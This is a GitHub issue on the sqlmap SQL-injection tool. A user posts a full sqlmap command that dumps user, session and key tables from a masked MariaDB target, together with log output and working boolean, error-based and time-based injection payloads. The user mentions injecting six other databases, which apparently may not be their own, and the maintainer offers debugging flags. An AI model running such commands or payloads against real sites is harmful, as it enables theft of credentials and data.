### ISSUE TITLE
can't get the columns from the tables 

### ISSUE THREAD

**Issue by theblackattacker** [sqlmapproject/sqlmap#5548]
**Describe the bug**

**To Reproduce**
1. Run '...'
sqlmap -u "https://help:443/id?=xx" --cookie="xxxxxxx; help_help" --user-agent="Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) " --delay=0 --timeout=30 --retries=0 --dbms="MariaDB" --os=Linux --level=3 --risk=1 --threads=1 --time-sec=5 --technique=BEUSTQ -b --current-user --dbs --dump  --batch --answers="crack=N,dict=N,continue=Y,quit=N"

3. See error
[23:25:09] [WARNING] unable to retrieve column names for table '#__users' in database 'xxx'
[23:25:09] [WARNING] unable to enumerate the columns for table '#__session' in database 'xxxx', skipping
[23:25:09] [INFO] fetching columns for table '#__user_keys' in database 'xxxxxxx'
[23:25:10] [WARNING] unable to retrieve column names for table '#__user_keys' in database 'xxxx'
[23:25:10] [WARNING] unable to enumerate the columns for table '#__userdb' in database 'xxx', skipping
[23:25:10] [INFO] fetching columns for table '#__jcomments_vo' in database 'xxxxx'

**Expected behavior**
i have other 6 DB i did inejected them , but this DB the Tables has hashtags , i couldnt , even i deleted the hashtages , or ___ nothing happend 

**Running environment:**
 - sqlmap version [e.g. 1.7.2.12#dev]
 1.7.10.1#dev 
 - Installation method [e.g. pip]
 apt-get install sqlmap
apt-get install snapd 
sqlmap --update

 - Operating system: [e.g. Microsoft Windows 11]
 - Linux  6.1.42+ #1 SMP PREEMPT_DYNAMIC Sat Sep 30 14:24:00 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
 - Python version [e.g. 3.11.2]
Python 3.8.10

**Target details:**
 - DBMS [e.g. Microsoft SQL Server]
 - MariaDB
 - SQLi techniques found by sqlmap [e.g. error-based and boolean-based blind]
 Parameter: id(GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=' AND 1502=1502 OR 'TMFz'='

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: id1=' AND EXTRACTVALUE(6489,CONCAT(0x5c,0x716a786b71,(SELECT (ELT(6489=6489,1))),0x7170767871)) OR 'hDjE'='0

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=' AND (SELECT 8483 FROM (SELECT(SLEEP(5)))HQxL) OR 'Ujcm'='pROV&
---
How can i solve this issue ?

**Comment by stamparm** [comment]
you have error-based SQLi. that means that you have the most grateful target for debugging - i.e. to see what's going on in error messages. restart your dump and run with `-t traffic.txt --parse-errors`. Afterwards, inspect the content of `traffic.txt`
